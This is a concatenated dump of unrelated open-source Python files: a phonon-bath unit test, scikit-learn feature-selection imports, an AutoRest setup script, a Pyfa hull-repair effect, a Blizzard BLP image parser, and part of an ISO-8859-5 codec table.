assert baths.dlst_ph.tolist() == [[dband_ph_min,dband_ph_max], [3.21,3.22]]
baths.add(tlst_ph={1: 2.13}, dlst_ph={1: [3.21,3.22]})
assert baths.tlst_ph.tolist() == [temp_ph, 2*2.13]
assert baths.dlst_ph.tolist() == [[dband_ph_min,dband_ph_max], [2*3.21,2*3.22]]
#
baths.change(tlst_ph=2)
assert baths.tlst_ph.tolist() == [2, 2]
baths.change(tlst_ph=tlst_ph)
baths.add(tlst_ph=2)
assert baths.tlst_ph.tolist() == [temp_ph+2, temp_ph+2]
#
Tba_tmp = np.array(baths.Vbbp)
baths.Vbbp.fill(0.0)
baths.use_Vbbp0()
assert norm(baths.Vbbp - Tba_tmp) < EPS
def test_PhononBaths_spin():
nsingle = 4
nbaths = 2
b1_elph_d, b1_elph_o = 1.0, 2.0
b2_elph_d, b2_elph_o = 3.0, 4.0
temp_ph, dband_ph_min, dband_ph_max = 1.0, 0.1, 60.0
dband_ph = [dband_ph_min, dband_ph_max]
tlst_ph = {0: temp_ph, 1: temp_ph}
dlst_ph = {0: dband_ph, 1: dband_ph}
velph = np.array([[[b1_elph_d,b1_elph_o], [b1_elph_o,b1_elph_d]],
[[b2_elph_d,b2_elph_o], [b2_elph_o,b2_elph_d]]])
si = StateIndexing(nsingle, symmetry='spin')
baths = PhononBaths(nbaths, velph, si, tlst_ph, dlst_ph)
#
velph_dict_no_spin = {(0,0,0):b1_elph_d, (0,1,1):b1_elph_d, (0,0,1):b1_elph_o, (0,1,0):b1_elph_o,
(1,0,0):b2_elph_d, (1,1,1):b2_elph_d, (1,0,1):b2_elph_o, (1,1,0):b2_elph_o}
velph_dict = {(0,0,0):b1_elph_d, (0,1,1):b1_elph_d, (0,0,1):b1_elph_o, (0,1,0):b1_elph_o,
(1,0,0):b2_elph_d, (1,1,1):b2_elph_d, (1,0,1):b2_elph_o, (1,1,0):b2_elph_o,
(0,2,2):b1_elph_d, (0,3,3):b1_elph_d, (0,2,3):b1_elph_o, (0,3,2):b1_elph_o,
(1,2,2):b2_elph_d, (1,3,3):b2_elph_d, (1,2,3):b2_elph_o, (1,3,2):b2_elph_o}
assert baths.velph == velph_dict
assert baths.si.nbaths == 2
assert baths.tlst_ph.tolist() == [temp_ph, temp_ph]
assert baths.dlst_ph.tolist() == [dband_ph, dband_ph]
#
baths.add(velph={(0,0,0):1.0, (0,1,1):2.0, (0,0,1):3.0, (0,1,0):4.0,
(1,0,0):5.0, (1,1,1):6.0, (1,0,1):7.0, (1,1,0):8.0},
tlst_ph={0:1.0, 1:2.0},
dlst_ph={0:[1.0,2.0], 1:[3.0,4.0]})
assert baths.velph == {(0,0,0):b1_elph_d+1.0, (0,1,1):b1_elph_d+2.0, (0,0,1):b1_elph_o+3.0, (0,1,0):b1_elph_o+4.0,
(1,0,0):b2_elph_d+5.0, (1,1,1):b2_elph_d+6.0, (1,0,1):b2_elph_o+7.0, (1,1,0):b2_elph_o+8.0,
(0,2,2):b1_elph_d+1.0, (0,3,3):b1_elph_d+2.0, (0,2,3):b1_elph_o+3.0, (0,3,2):b1_elph_o+4.0,
(1,2,2):b2_elph_d+5.0, (1,3,3):b2_elph_d+6.0, (1,2,3):b2_elph_o+7.0, (1,3,2):b2_elph_o+8.0}
assert baths.tlst_ph.tolist() == [temp_ph+1.0, temp_ph+2.0]
assert baths.dlst_ph.tolist() == [[dband_ph_min+1.0,dband_ph_max+2.0], [dband_ph_min+3.0,dband_ph_max+4.0]]
#
baths.change(velph=velph_dict_no_spin,
tlst_ph=[temp_ph, temp_ph],
dlst_ph=[dband_ph, dband_ph])
assert baths.velph == velph_dict
assert baths.tlst_ph.tolist() == [temp_ph, temp_ph]
assert baths.dlst_ph.tolist() == [dband_ph, dband_ph]
#
baths.change(tlst_ph={1: 2.13}, dlst_ph={1: [3.21,3.22]})
assert baths.tlst_ph.tolist() == [temp_ph, 2.13]
assert baths.dlst_ph.tolist() == [[dband_ph_min,dband_ph_max], [3.21,3.22]]
baths.add(tlst_ph={1: 2.13}, dlst_ph={1: [3.21,3.22]})
assert baths.tlst_ph.tolist() == [temp_ph, 2*2.13]
assert baths.dlst_ph.tolist() == [[dband_ph_min,dband_ph_max], [2*3.21,2*3.22]]
#
baths.change(tlst_ph=2)
assert baths.tlst_ph.tolist() == [2, 2]
baths.change(tlst_ph=tlst_ph)
baths.add(tlst_ph=2)
assert baths.tlst_ph.tolist() == [temp_ph+2, temp_ph+2]
#
Tba_tmp = np.array(baths.Vbbp)
baths.Vbbp.fill(0.0)
baths.use_Vbbp0()
assert norm(baths.Vbbp - Tba_tmp) < EPS
|
moutai/scikit-learn
|
refs/heads/master
|
sklearn/feature_selection/__init__.py
|
140
|
"""
The :mod:`sklearn.feature_selection` module implements feature selection
algorithms. It currently includes univariate filter selection methods and the
recursive feature elimination algorithm.
"""
from .univariate_selection import chi2
from .univariate_selection import f_classif
from .univariate_selection import f_oneway
from .univariate_selection import f_regression
from .univariate_selection import SelectPercentile
from .univariate_selection import SelectKBest
from .univariate_selection import SelectFpr
from .univariate_selection import SelectFdr
from .univariate_selection import SelectFwe
from .univariate_selection import GenericUnivariateSelect
from .variance_threshold import VarianceThreshold
from .rfe import RFE
from .rfe import RFECV
from .from_model import SelectFromModel
from .mutual_info_ import mutual_info_regression, mutual_info_classif
__all__ = ['GenericUnivariateSelect',
'RFE',
'RFECV',
'SelectFdr',
'SelectFpr',
'SelectFwe',
'SelectKBest',
'SelectFromModel',
'SelectPercentile',
'VarianceThreshold',
'chi2',
'f_classif',
'f_oneway',
'f_regression',
'mutual_info_classif',
'mutual_info_regression']
|
stankovski/AutoRest
|
refs/heads/master
|
AutoRest/Generators/Python/Python.Tests/Expected/AcceptanceTests/Report/setup.py
|
2
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
NAME = "autorestreportservice"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.1.0"]
setup(
name=NAME,
version=VERSION,
description="AutoRestReportService",
author_email="",
url="",
keywords=["Swagger", "AutoRestReportService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Test Infrastructure for AutoRest
"""
)
|
Ebag333/Pyfa
|
refs/heads/master
|
eos/effects/remotehullrepair.py
|
1
|
# Not used by any item
type = "projected", "active"
runTime = "late"
def handler(fit, module, context):
if "projected" not in context:
return
bonus = module.getModifiedItemAttr("structureDamageAmount")
duration = module.getModifiedItemAttr("duration") / 1000.0
fit.extraAttributes.increase("hullRepair", bonus / duration)
|
hernandito/SickRage
|
refs/heads/master
|
lib/hachoir_parser/game/blp.py
|
86
|
"""
Blizzard BLP Image File Parser
Author: Robert Xiao
Creation date: July 10 2007
- BLP1 File Format
http://magos.thejefffiles.com/War3ModelEditor/MagosBlpFormat.txt
- BLP2 File Format (Wikipedia)
http://en.wikipedia.org/wiki/.BLP
- S3TC (DXT1, 3, 5) Formats
http://en.wikipedia.org/wiki/S3_Texture_Compression
"""
from hachoir_core.endian import LITTLE_ENDIAN
from hachoir_core.field import String, UInt32, UInt8, Enum, FieldSet, RawBytes, GenericVector, Bit, Bits
from hachoir_parser.parser import Parser
from hachoir_parser.image.common import PaletteRGBA
from hachoir_core.tools import alignValue
class PaletteIndex(UInt8):
def createDescription(self):
return "Palette index %i (%s)" % (self.value, self["/palette/color[%i]" % self.value].description)
class Generic2DArray(FieldSet):
def __init__(self, parent, name, width, height, item_class, row_name="row", item_name="item", *args, **kwargs):
FieldSet.__init__(self, parent, name, *args, **kwargs)
self.width = width
self.height = height
self.item_class = item_class
self.row_name = row_name
self.item_name = item_name
def createFields(self):
for i in xrange(self.height):
yield GenericVector(self, self.row_name+"[]", self.width, self.item_class, self.item_name)
class BLP1File(Parser):
MAGIC = "BLP1"
PARSER_TAGS = {
"id": "blp1",
"category": "game",
"file_ext": ("blp",),
"mime": (u"application/x-blp",), # TODO: real mime type???
"magic": ((MAGIC, 0),),
"min_size": 7*32, # 7 DWORDs start, incl. magic
"description": "Blizzard Image Format, version 1",
}
endian = LITTLE_ENDIAN
def validate(self):
if self.stream.readBytes(0, 4) != "BLP1":
return "Invalid magic"
return True
def createFields(self):
yield String(self, "magic", 4, "Signature (BLP1)")
yield Enum(UInt32(self, "compression"), {
0:"JPEG Compression",
1:"Uncompressed"})
yield UInt32(self, "flags")
yield UInt32(self, "width")
yield UInt32(self, "height")
yield Enum(UInt32(self, "type"), {
3:"Uncompressed Index List + Alpha List",
4:"Uncompressed Index List + Alpha List",
5:"Uncompressed Index List"})
yield UInt32(self, "subtype")
for i in xrange(16):
yield UInt32(self, "mipmap_offset[]")
for i in xrange(16):
yield UInt32(self, "mipmap_size[]")
compression = self["compression"].value
image_type = self["type"].value
width = self["width"].value
height = self["height"].value
if compression == 0: # JPEG Compression
yield UInt32(self, "jpeg_header_len")
yield RawBytes(self, "jpeg_header", self["jpeg_header_len"].value, "Shared JPEG Header")
else:
yield PaletteRGBA(self, "palette", 256)
offsets = self.array("mipmap_offset")
sizes = self.array("mipmap_size")
for i in xrange(16):
if not offsets[i].value or not sizes[i].value:
continue
padding = self.seekByte(offsets[i].value)
if padding:
yield padding
if compression == 0:
yield RawBytes(self, "mipmap[%i]" % i, sizes[i].value, "JPEG data, append to header to recover complete image")
elif compression == 1:
yield Generic2DArray(self, "mipmap_indexes[%i]" % i, width, height, PaletteIndex, "row", "index", "Indexes into the palette")
if image_type in (3, 4):
yield Generic2DArray(self, "mipmap_alphas[%i]" % i, width, height, UInt8, "row", "alpha", "Alpha values")
width /= 2
height /= 2
def interp_avg(data_low, data_high, n):
"""Interpolated averages. For example,
>>> list(interp_avg(1, 10, 3))
[4, 7]
"""
if isinstance(data_low, (int, long)):
for i in range(1, n):
yield (data_low * (n-i) + data_high * i) / n
else: # iterable
pairs = zip(data_low, data_high)
pair_iters = [interp_avg(x, y, n) for x, y in pairs]
for i in range(1, n):
yield [iter.next() for iter in pair_iters]
def color_name(data, bits):
"""Color names in #RRGGBB format, given the number of bits for each component."""
ret = ["#"]
for i in range(3):
ret.append("%02X" % (data[i] << (8-bits[i])))
return ''.join(ret)
class DXT1(FieldSet):
static_size = 64
def __init__(self, parent, name, dxt2_mode=False, *args, **kwargs):
"""with dxt2_mode on, this field will always use the four color model"""
FieldSet.__init__(self, parent, name, *args, **kwargs)
self.dxt2_mode = dxt2_mode
def createFields(self):
values = [[], []]
for i in (0, 1):
yield Bits(self, "blue[]", 5)
yield Bits(self, "green[]", 6)
yield Bits(self, "red[]", 5)
values[i] = [self["red[%i]" % i].value,
self["green[%i]" % i].value,
self["blue[%i]" % i].value]
if values[0] > values[1] or self.dxt2_mode:
values += interp_avg(values[0], values[1], 3)
else:
values += interp_avg(values[0], values[1], 2)
values.append(None) # transparent
for i in xrange(16):
pixel = Bits(self, "pixel[%i][%i]" % divmod(i, 4), 2)
color = values[pixel.value]
if color is None:
pixel._description = "Transparent"
else:
pixel._description = "RGB color: %s" % color_name(color, [5, 6, 5])
yield pixel
class DXT3Alpha(FieldSet):
static_size = 64
def createFields(self):
for i in xrange(16):
yield Bits(self, "alpha[%i][%i]" % divmod(i, 4), 4)
class DXT3(FieldSet):
static_size = 128
def createFields(self):
yield DXT3Alpha(self, "alpha", "Alpha Channel Data")
yield DXT1(self, "color", True, "Color Channel Data")
class DXT5Alpha(FieldSet):
static_size = 64
def createFields(self):
values = []
yield UInt8(self, "alpha_val[0]", "First alpha value")
values.append(self["alpha_val[0]"].value)
yield UInt8(self, "alpha_val[1]", "Second alpha value")
values.append(self["alpha_val[1]"].value)
if values[0] > values[1]:
values += interp_avg(values[0], values[1], 7)
else:
values += interp_avg(values[0], values[1], 5)
values += [0, 255]
for i in xrange(16):
pixel = Bits(self, "alpha[%i][%i]" % divmod(i, 4), 3)
alpha = values[pixel.value]
pixel._description = "Alpha value: %i" % alpha
yield pixel
class DXT5(FieldSet):
static_size = 128
def createFields(self):
yield DXT5Alpha(self, "alpha", "Alpha Channel Data")
yield DXT1(self, "color", True, "Color Channel Data")
class BLP2File(Parser):
MAGIC = "BLP2"
PARSER_TAGS = {
"id": "blp2",
"category": "game",
"file_ext": ("blp",),
"mime": (u"application/x-blp",),
"magic": ((MAGIC, 0),),
"min_size": 5*32, # 5 DWORDs start, incl. magic
"description": "Blizzard Image Format, version 2",
}
endian = LITTLE_ENDIAN
def validate(self):
if self.stream.readBytes(0, 4) != "BLP2":
return "Invalid magic"
return True
def createFields(self):
yield String(self, "magic", 4, "Signature (BLP2)")
yield Enum(UInt32(self, "compression", "Compression type"), {
0:"JPEG Compressed",
1:"Uncompressed or DXT/S3TC compressed"})
yield Enum(UInt8(self, "encoding", "Encoding type"), {
1:"Raw",
2:"DXT/S3TC Texture Compression (a.k.a. DirectX)"})
yield UInt8(self, "alpha_depth", "Alpha channel depth, in bits (0 = no alpha)")
yield Enum(UInt8(self, "alpha_encoding", "Encoding used for alpha channel"), {
0:"DXT1 alpha (0 or 1 bit alpha)",
1:"DXT3 alpha (4 bit alpha)",
7:"DXT5 alpha (8 bit interpolated alpha)"})
yield Enum(UInt8(self, "has_mips", "Are mip levels present?"), {
0:"No mip levels",
1:"Mip levels present; number of levels determined by image size"})
yield UInt32(self, "width", "Base image width")
yield UInt32(self, "height", "Base image height")
for i in xrange(16):
yield UInt32(self, "mipmap_offset[]")
for i in xrange(16):
yield UInt32(self, "mipmap_size[]")
yield PaletteRGBA(self, "palette", 256)
compression = self["compression"].value
encoding = self["encoding"].value
alpha_depth = self["alpha_depth"].value
alpha_encoding = self["alpha_encoding"].value
width = self["width"].value
height = self["height"].value
if compression == 0: # JPEG Compression
yield UInt32(self, "jpeg_header_len")
yield RawBytes(self, "jpeg_header", self["jpeg_header_len"].value, "Shared JPEG Header")
offsets = self.array("mipmap_offset")
sizes = self.array("mipmap_size")
for i in xrange(16):
if not offsets[i].value or not sizes[i].value:
continue
padding = self.seekByte(offsets[i].value)
if padding:
yield padding
if compression == 0:
yield RawBytes(self, "mipmap[%i]" % i, sizes[i].value, "JPEG data, append to header to recover complete image")
elif compression == 1 and encoding == 1:
yield Generic2DArray(self, "mipmap_indexes[%i]" % i, height, width, PaletteIndex, "row", "index", "Indexes into the palette")
if alpha_depth == 1:
yield GenericVector(self, "mipmap_alphas[%i]" % i, height, width, Bit, "row", "is_opaque", "Alpha values")
elif alpha_depth == 8:
yield GenericVector(self, "mipmap_alphas[%i]" % i, height, width, UInt8, "row", "alpha", "Alpha values")
elif compression == 1 and encoding == 2:
block_height = alignValue(height, 4) // 4
block_width = alignValue(width, 4) // 4
if alpha_depth in [0, 1] and alpha_encoding == 0:
yield Generic2DArray(self, "mipmap[%i]" % i, block_height, block_width, DXT1, "row", "block", "DXT1-compressed image blocks")
elif alpha_depth == 8 and alpha_encoding == 1:
yield Generic2DArray(self, "mipmap[%i]" % i, block_height, block_width, DXT3, "row", "block", "DXT3-compressed image blocks")
elif alpha_depth == 8 and alpha_encoding == 7:
yield Generic2DArray(self, "mipmap[%i]" % i, block_height, block_width, DXT5, "row", "block", "DXT5-compressed image blocks")
width /= 2
height /= 2
|
jjingrong/PONUS-1.2
|
refs/heads/master
|
venv/Lib/encodings/iso8859_5.py
|
593
|
""" Python Character Mapping Codec iso8859_5 generated from 'MAPPINGS/ISO8859/8859-5.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-5',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\x80' # 0x80 -> <control>
u'\x81' # 0x81 -> <control>
u'\x82' # 0x82 -> <control>
u'\x83' # 0x83 -> <control>
u'\x84' # 0x84 -> <control>
u'\x85' # 0x85 -> <control>
u'\x86' # 0x86 -> <control>
u'\x87' # 0x87 -> <control>
u'\x88' # 0x88 -> <control>
u'\x89' # 0x89 -> <control>
u'\x8a' # 0x8A -> <control>
u'\x8b' # 0x8B -> <control>
u'\x8c' # 0x8C -> <control>
u'\x8d' # 0x8D -> <control>
u'\x8e' # 0x8E -> <control>
u'\x8f' # 0x8F -> <control>
u'\x90' # 0x90 -> <control>
u'\x91' # 0x91 -> <control>
u'\x92' # 0x92 -> <control>
u'\x93' # 0x93 -> <control>
u'\x94' # 0x94 -> <control>
u'\x95' # 0x95 -> <control>
u'\x96' # 0x96 -> <control>
u'\x97' # 0x97 -> <control>
u'\x98' # 0x98 -> <control>
u'\x99' # 0x99 -> <control>
u'\x9a' # 0x9A -> <control>
u'\x9b' # 0x9B -> <control>
u'\x9c' # 0x9C -> <control>
u'\x9d' # 0x9D -> <control>
u'\x9e' # 0x9E -> <control>
u'\x9f' # 0x9F -> <control>
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\u0401' # 0xA1 -> CYRILLIC CAPITAL LETTER IO
u'\u0402' # 0xA2 -> CYRILLIC CAPITAL LETTER DJE
u'\u0403' # 0xA3 -> CYRILLIC CAPITAL LETTER GJE
u'\u0404' # 0xA4 -> CYRILLIC CAPITAL LETTER UKRAINIAN IE
u'\u0405' # 0xA5 -> CYRILLIC CAPITAL LETTER DZE
u'\u0406' # 0xA6 -> CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
u'\u0407' # 0xA7 -> CYRILLIC CAPITAL LETTER YI
u'\u0408' # 0xA8 -> CYRILLIC CAPITAL LETTER JE
u'\u0409' # 0xA9 -> CYRILLIC CAPITAL LETTER LJE
u'\u040a' # 0xAA -> CYRILLIC CAPITAL LETTER NJE
u'\u040b' # 0xAB -> CYRILLIC CAPITAL LETTER TSHE
u'\u040c' # 0xAC -> CYRILLIC CAPITAL LETTER KJE
u'\xad' # 0xAD -> SOFT HYPHEN
u'\u040e' # 0xAE -> CYRILLIC CAPITAL LETTER SHORT U
u'\u040f' # 0xAF -> CYRILLIC CAPITAL LETTER DZHE
u'\u0410' # 0xB0 -> CYRILLIC CAPITAL LETTER A
u'\u0411' # 0xB1 -> CYRILLIC CAPITAL LETTER BE
u'\u0412' # 0xB2 -> CYRILLIC CAPITAL LETTER VE
u'\u0413' # 0xB3 -> CYRILLIC CAPITAL LETTER GHE
u'\u0414' # 0xB4 -> CYRILLIC CAPITAL LETTER DE
u'\u0415' # 0xB5 -> CYRILLIC CAPITAL LETTER IE
u'\u0416' # 0xB6 -> CYRILLIC CAPITAL LETTER ZHE
u'\u0417' # 0xB7 -> CYRILLIC CAPITAL LETTER ZE
u'\u0418' # 0xB8 -> CYRILLIC CAPITAL LETTER I
u'\u0419' # 0xB9 -> CYRILLIC CAPITAL LETTER SHORT I
u'\u041a' # 0xBA -> CYRILLIC CAPITAL LETTER KA
u'\u041b' # 0xBB -> CYRILLIC CAPITAL LETTER EL
u'\u041c' # 0xBC -> CYRILLIC CAPITAL LETTER EM
u'\u041d' # 0xBD -> CYRILLIC CAPITAL LETTER EN
u'\u041e' # 0xBE -> CYRILLIC CAPITAL LETTER O
u'\u041f' # 0xBF -> CYRILLIC CAPITAL LETTER PE
u'\u0420' # 0xC0 -> CYRILLIC CAPITAL LETTER ER
u'\u0421' # 0xC1 -> CYRILLIC CAPITAL LETTER ES
u'\u0422' # 0xC2 -> CYRILLIC CAPITAL LETTER TE
u'\u0423' # 0xC3 -> CYRILLIC CAPITAL LETTER U
u'\u0424' # 0xC4 -> CYRILLIC CAPITAL LETTER EF
u'\u0425' # 0xC5 -> CYRILLIC CAPITAL LETTER HA
u'\u0426' # 0xC6 -> CYRILLIC CAPITAL LETTER TSE
u'\u0427' # 0xC7 -> CYRILLIC CAPITAL LETTER CHE
u'\u0428' # 0xC8 -> CYRILLIC CAPITAL LETTER SHA
u'\u0429' # 0xC9 -> CYRILLIC CAPITAL LETTER SHCHA
u'\u042a' # 0xCA -> CYRILLIC CAPITAL LETTER HARD SIGN
u'\u042b' # 0xCB -> CYRILLIC CAPITAL LETTER YERU
u'\u042c' # 0xCC -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u042d' # 0xCD -> CYRILLIC CAPITAL LETTER E
u'\u042e' # 0xCE -> CYRILLIC CAPITAL LETTER YU
u'\u042f' # 0xCF -> CYRILLIC CAPITAL LETTER YA
u'\u0430' # 0xD0 -> CYRILLIC SMALL LETTER A
u'\u0431' # 0xD1 -> CYRILLIC SMALL LETTER BE
u'\u0432' # 0xD2 -> CYRILLIC SMALL LETTER VE
u'\u0433' # 0xD3 -> CYRILLIC SMALL LETTER GHE
u'\u0434' # 0xD4 -> CYRILLIC SMALL LETTER DE
u'\u0435' # 0xD5 -> CYRILLIC SMALL LETTER IE
u'\u0436' # 0xD6 -> CYRILLIC SMALL LETTER ZHE
u'\u0437' # 0xD7 -> CYRILLIC SMALL LETTER ZE
u'\u0438' # 0xD8 -> CYRILLIC SMALL LETTER I
u'\u0439' # 0xD9 -> CYRILLIC SMALL LETTER SHORT I
u'\u043a' # 0xDA -> CYRILLIC SMALL LETTER KA
u'\u043b' # 0xDB -> CYRILLIC SMALL LETTER EL
u'\u043c' # 0xDC -> CYRILLIC SMALL LETTER EM
u'\u043d' # 0xDD -> CYRILLIC SMALL LETTER EN
u'\u043e' # 0xDE -> CYRILLIC SMALL LETTER O
u'\u043f' # 0xDF -> CYRILLIC SMALL LETTER PE
u'\u0440' # 0xE0 -> CYRILLIC SMALL LETTER ER
u'\u0441' # 0xE1 -> CYRILLIC SMALL LETTER ES
u'\u0442' # 0xE2 -> CYRILLIC SMALL LETTER TE
u'\u0443' # 0xE3 -> CYRILLIC SMALL LETTER U
u'\u0444' # 0xE4 -> CYRILLIC SMALL LETTER EF
u'\u0445' # 0xE5 -> CYRILLIC SMALL LETTER HA
u'\u0446' # 0xE6 -> CYRILLIC SMALL LETTER TSE
u'\u0447' # 0xE7 -> CYRILLIC SMALL LETTER CHE
u'\u0448' # 0xE8 -> CYRILLIC SMALL LETTER SHA
u'\u0449' # 0xE9 -> CYRILLIC SMALL LETTER SHCHA
u'\u044a' # 0xEA -> CYRILLIC SMALL LETTER HARD SIGN
u'\u044b' # 0xEB -> CYRILLIC SMALL LETTER YERU
u'\u044c' # 0xEC -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u044d' # 0xED -> CYRILLIC SMALL LETTER E
u'\u044e' # 0xEE -> CYRILLIC SMALL LETTER YU
u'\u044f' # 0xEF -> CYRILLIC SMALL LETTER YA
u'\u2116' # 0xF0 -> NUMERO SIGN
